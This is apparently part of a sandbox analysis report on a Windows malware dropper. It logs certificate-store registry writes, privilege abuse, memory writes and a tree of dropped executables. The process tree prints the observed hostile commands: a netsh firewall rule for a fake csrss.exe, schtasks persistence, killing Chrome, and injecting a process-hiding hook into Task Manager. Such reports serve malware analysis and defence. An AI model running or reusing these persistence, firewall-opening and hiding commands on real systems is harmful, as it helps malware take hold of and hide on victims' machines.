d31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Install.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53	Install.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53\Blob = 030000000100000014000000151682f5218c0a511c28f4060a73b9ca78ce9a531400000001000000140000007c4296aede4b483bfa92f89e8ccf6d8ba972379504000000010000001000000029f1c1b26d92e893b6e6852ab708cce10f00000001000000200000005aef843ffcf2ec7055f504a162f229f8391c370ff3a6163d2db3f3d604d622be19000000010000001000000070d4f0bec2078234214bd651643b02405c0000000100000004000000800100001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da62000000001000000640400003082046030820248a0030201020210079e492886376fd40848c23fc631e463300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3230303930343030303030305a170d3235303931353136303030305a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f742058323076301006072a8648ce3d020106052b8104002203620004cd9bd59f80830aec094af3164a3e5ccf77acde67050d1d07b6dc16fb5a8b14dbe27160c4ba459511898eea06dff72a161ca4b9c5c532e003e01e8218388bd745d80a6a6ee60077fb02517d22d80a6e9a5b77dff0fa41ec39dc75ca68070c1feaa381e53081e2300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604147c4296aede4b483bfa92f89e8ccf6d8ba9723795301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f30220603551d20041b30193008060667810c010201300d060b2b0601040182df13010101300d06092a864886f70d01010b050003820201001b7f252b907a0876007718e1c32e8a364c417ebf174be330d75b0c7e9c96986f7bb068c02444cce2f2fcd1eadbd29f01f9174d0c9d55fda5ad6dd22f3f4b72c02eae73c7251657c23e15ade031d10a84846c6278423122461aed7a40bf9716814477ca6c7b5d215c07f2119121bfe12fc2ef6efd0520e4b4f779f32dbb372af0c6b1acac51f51fb35a1e66ce580718387f71a93c83bad7bc829e9a760f9eb029fdcbf38907481bfeab932e14210d5faf8eb754ab5d0ed45b4c71d092ea3da3369b7c1fe03b55b9d85353cc8366bb4adc810600188bf4b3d748b11341b9c4b69ecf2c778e42200b807e9fc5ab48dbbc6f048d6c4629020d708a1df11273b64624429e2a1718e3acc798c272cc6d2d766ddd2c2b2696a5cf21081be5da2fcbef9f7393aef8365f478f9728ceabe29826988bfdee28322229ed4c9509c420fa07e1862c44f68147c0e46232ed1dd83c488896c35e91b6af7b59a4eee3869cc78858ca282a66559b8580b91dd8402bc91c133ca9ebde99c21640f6f5a4ae2a256c52bac7044cb432bbfc385ca00c617b57ec774e50cfaf06a20f378ce10ed2d32f1abd9c713ecce1f8d1a8a3bd04f619c0f986aff50e1aaa956befca47714b631c4d96db55230a9d0f8175a0e640f56446036ecefa6a7d06eca4340674da53d8b9b8c6237da9f82a2da482a62e2d11cae6cd31587985e6721ca79fd34cd066d0a7bb	Install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Graphics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d601030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Graphics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c137e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Graphics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Install.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exe

pid	process
4444	pub2.exe
4444	pub2.exe
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1032
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4444 pub2.exe

pid	process
1032

Suspicious use of AdjustPrivilegeToken 53 IoCs

Processes:

FoxSBrowser.exeInstall.exemd9_1sjm.exetaskkill.exeGraphics.exesvchost.exeGraphics.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	2988	FoxSBrowser.exe
Token: SeCreateTokenPrivilege	3356	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3356	Install.exe
Token: SeLockMemoryPrivilege	3356	Install.exe
Token: SeIncreaseQuotaPrivilege	3356	Install.exe
Token: SeMachineAccountPrivilege	3356	Install.exe
Token: SeTcbPrivilege	3356	Install.exe
Token: SeSecurityPrivilege	3356	Install.exe
Token: SeTakeOwnershipPrivilege	3356	Install.exe
Token: SeLoadDriverPrivilege	3356	Install.exe
Token: SeSystemProfilePrivilege	3356	Install.exe
Token: SeSystemtimePrivilege	3356	Install.exe
Token: SeProfSingleProcessPrivilege	3356	Install.exe
Token: SeIncBasePriorityPrivilege	3356	Install.exe
Token: SeCreatePagefilePrivilege	3356	Install.exe
Token: SeCreatePermanentPrivilege	3356	Install.exe
Token: SeBackupPrivilege	3356	Install.exe
Token: SeRestorePrivilege	3356	Install.exe
Token: SeShutdownPrivilege	3356	Install.exe
Token: SeDebugPrivilege	3356	Install.exe
Token: SeAuditPrivilege	3356	Install.exe
Token: SeSystemEnvironmentPrivilege	3356	Install.exe
Token: SeChangeNotifyPrivilege	3356	Install.exe
Token: SeRemoteShutdownPrivilege	3356	Install.exe
Token: SeUndockPrivilege	3356	Install.exe
Token: SeSyncAgentPrivilege	3356	Install.exe
Token: SeEnableDelegationPrivilege	3356	Install.exe
Token: SeManageVolumePrivilege	3356	Install.exe
Token: SeImpersonatePrivilege	3356	Install.exe
Token: SeCreateGlobalPrivilege	3356	Install.exe
Token: 31	3356	Install.exe
Token: 32	3356	Install.exe
Token: 33	3356	Install.exe
Token: 34	3356	Install.exe
Token: 35	3356	Install.exe
Token: SeManageVolumePrivilege	764	md9_1sjm.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeManageVolumePrivilege	764	md9_1sjm.exe
Token: SeDebugPrivilege	4292	Graphics.exe
Token: SeImpersonatePrivilege	4292	Graphics.exe
Token: SeTcbPrivilege	2016	svchost.exe
Token: SeTcbPrivilege	2016	svchost.exe
Token: SeManageVolumePrivilege	764	md9_1sjm.exe
Token: SeSystemEnvironmentPrivilege	4332	Graphics.exe
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeManageVolumePrivilege	764	md9_1sjm.exe
Token: SeBackupPrivilege	2016	svchost.exe
Token: SeRestorePrivilege	2016	svchost.exe
Token: SeBackupPrivilege	2016	svchost.exe
Token: SeRestorePrivilege	2016	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	csrss.exe
Token: SeManageVolumePrivilege	764	md9_1sjm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Service.bmp.exe

pid process

2280 Service.bmp.exe

pid	process
2280	Service.bmp.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exeFolder.exerUNdlL32.eXeInstall.execmd.exesvchost.exeGraphics.execmd.execsrss.exeFile.exe

description	pid	process	target process
PID 4160 wrote to memory of 764	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	md9_1sjm.exe
PID 4160 wrote to memory of 764	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	md9_1sjm.exe
PID 4160 wrote to memory of 764	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	md9_1sjm.exe
PID 4160 wrote to memory of 2988	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	FoxSBrowser.exe
PID 4160 wrote to memory of 2988	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	FoxSBrowser.exe
PID 4160 wrote to memory of 3000	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Folder.exe
PID 4160 wrote to memory of 3000	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Folder.exe
PID 4160 wrote to memory of 3000	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Folder.exe
PID 4160 wrote to memory of 4292	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Graphics.exe
PID 4160 wrote to memory of 4292	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Graphics.exe
PID 4160 wrote to memory of 4292	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Graphics.exe
PID 4160 wrote to memory of 4284	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Updbdate.exe
PID 4160 wrote to memory of 4284	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Updbdate.exe
PID 4160 wrote to memory of 4284	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Updbdate.exe
PID 4160 wrote to memory of 3356	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Install.exe
PID 4160 wrote to memory of 3356	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Install.exe
PID 4160 wrote to memory of 3356	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Install.exe
PID 4160 wrote to memory of 1008	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	File.exe
PID 4160 wrote to memory of 1008	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	File.exe
PID 4160 wrote to memory of 1008	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	File.exe
PID 4160 wrote to memory of 4444	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	pub2.exe
PID 4160 wrote to memory of 4444	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	pub2.exe
PID 4160 wrote to memory of 4444	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	pub2.exe
PID 4160 wrote to memory of 2060	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Files.exe
PID 4160 wrote to memory of 2060	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Files.exe
PID 4160 wrote to memory of 176	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Details.exe
PID 4160 wrote to memory of 176	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Details.exe
PID 4160 wrote to memory of 176	4160	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe	Details.exe
PID 3000 wrote to memory of 2428	3000	Folder.exe	Folder.exe
PID 3000 wrote to memory of 2428	3000	Folder.exe	Folder.exe
PID 3000 wrote to memory of 2428	3000	Folder.exe	Folder.exe
PID 64 wrote to memory of 3632	64	rUNdlL32.eXe	rundll32.exe
PID 64 wrote to memory of 3632	64	rUNdlL32.eXe	rundll32.exe
PID 64 wrote to memory of 3632	64	rUNdlL32.eXe	rundll32.exe
PID 3356 wrote to memory of 2312	3356	Install.exe	cmd.exe
PID 3356 wrote to memory of 2312	3356	Install.exe	cmd.exe
PID 3356 wrote to memory of 2312	3356	Install.exe	cmd.exe
PID 2312 wrote to memory of 4584	2312	cmd.exe	taskkill.exe
PID 2312 wrote to memory of 4584	2312	cmd.exe	taskkill.exe
PID 2312 wrote to memory of 4584	2312	cmd.exe	taskkill.exe
PID 2016 wrote to memory of 4332	2016	svchost.exe	Graphics.exe
PID 2016 wrote to memory of 4332	2016	svchost.exe	Graphics.exe
PID 2016 wrote to memory of 4332	2016	svchost.exe	Graphics.exe
PID 4332 wrote to memory of 3284	4332	Graphics.exe	cmd.exe
PID 4332 wrote to memory of 3284	4332	Graphics.exe	cmd.exe
PID 3284 wrote to memory of 3924	3284	cmd.exe	netsh.exe
PID 3284 wrote to memory of 3924	3284	cmd.exe	netsh.exe
PID 4332 wrote to memory of 2600	4332	Graphics.exe	csrss.exe
PID 4332 wrote to memory of 2600	4332	Graphics.exe	csrss.exe
PID 4332 wrote to memory of 2600	4332	Graphics.exe	csrss.exe
PID 2016 wrote to memory of 3104	2016	svchost.exe	schtasks.exe
PID 2016 wrote to memory of 3104	2016	svchost.exe	schtasks.exe
PID 2600 wrote to memory of 1924	2600	csrss.exe	injector.exe
PID 2600 wrote to memory of 1924	2600	csrss.exe	injector.exe
PID 1008 wrote to memory of 2488	1008	File.exe	NiceProcessX64.bmp.exe
PID 1008 wrote to memory of 2488	1008	File.exe	NiceProcessX64.bmp.exe
PID 1008 wrote to memory of 2280	1008	File.exe	Service.bmp.exe
PID 1008 wrote to memory of 2280	1008	File.exe	Service.bmp.exe
PID 1008 wrote to memory of 2280	1008	File.exe	Service.bmp.exe
PID 1008 wrote to memory of 2400	1008	File.exe	TrdngAnlzr649.exe.exe
PID 1008 wrote to memory of 2400	1008	File.exe	TrdngAnlzr649.exe.exe
PID 1008 wrote to memory of 2400	1008	File.exe	TrdngAnlzr649.exe.exe
PID 1008 wrote to memory of 4368	1008	File.exe	SetupMEXX.exe.exe
PID 1008 wrote to memory of 4368	1008	File.exe	SetupMEXX.exe.exe

C:\Users\Admin\AppData\Local\Temp\e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe
"C:\Users\Admin\AppData\Local\Temp\e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4160

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
"C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3000

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:2428

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4292

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:3284

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:3924

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:3104

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:1924

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:4284

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2312

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4584

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1008

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
3⤵
- Executes dropped EXE
PID:2488

C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2280

C:\Users\Admin\Documents\JALImhCBZRe9iFbuIF8ffwYF.exe
"C:\Users\Admin\Documents\JALImhCBZRe9iFbuIF8ffwYF.exe"
4⤵
PID:4860

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
5⤵
PID:924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 1856
5⤵
- Program crash
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 1948
5⤵
- Program crash
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 2120
5⤵
- Program crash
PID:4928

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4592

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
